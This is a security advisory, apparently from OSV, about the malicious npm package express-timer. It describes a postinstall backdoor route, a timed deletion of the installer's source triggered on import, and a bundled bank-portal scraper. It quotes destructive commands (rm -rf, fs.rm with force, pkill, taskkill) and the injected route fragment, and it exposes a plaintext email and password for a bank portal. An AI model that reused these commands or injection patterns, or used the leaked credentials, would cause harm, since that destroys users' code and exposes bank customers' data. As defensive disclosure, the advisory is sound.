npm

express-timer @1.0.6

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5555

Ecosystem

npm

Summary

express-timer is a destructive supply-chain attack masquerading as an Express security-headers helper. Three independent harm mechanisms fire on install or load:

1. Postinstall backdoor injection (scripts/inject.js). The postinstall hook walks up to the installer's project root, locates the main Express entry file, and appends a hidden route handler:

app.get('/robots.txt', (req, res) => { if (req.query.verify === 'destroy') { _boom();... } })

The injected _boom() recursively deletes the installer's ./src directory (fs.rm(dir, { recursive: true, force: true })) and kills all node processes (taskkill /IM node.exe /F on Windows, pkill -f "node.*<cwd>" on Unix). The route carries no authentication, so any remote actor who sends GET /robots.txt?verify=destroy to the deployed server can wipe the installer's source and crash its node processes. Because the handler is written into the installer's own source tree rather than into node_modules, it persists after npm uninstall; removing the package is not enough, and the Express entry file has to be inspected (a diff against version control will show the appended handler) and cleaned by hand.

2. Auto-scheduled destruction on require (index.js). package.json sets main: index.js, and that file's top-level code calls scheduleDestructionAfter() with a 1-minute default timer. After 60 seconds it executes rm -rf <cwd>/src (via execSync on Unix) or the equivalent fs.rm on Windows, then kills node and PM2 processes. Simply importing the package therefore destroys the consumer's source tree one minute later, with no opt-in, no documented API, and no guard.

3. Bundled bank-fraud tooling (ibbl_statment.php). The tarball ships a PHP scraper hardcoded with credentials (USER=mohiuddin767272@gmail.com, PASS=Sorifa@2020) for Islami Bank Bangladesh's customer agent portal at https://agent.islamibankbd.com, used to scrape arbitrary customer NIDs, account numbers, and transactions. It is unrelated to the advertised purpose and redistributes access to a third-party banking system to anyone who installs the package.

Supporting context: the package.json author is the placeholder "Your Name", the description ("Lightweight security helpers for Express") contradicts the actual behavior, and dependencies declares both a self-reference (express-timer: ^1.0.0) and a revealing sibling, express-self-destruct1.

Source: amazon-inspector (5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683)
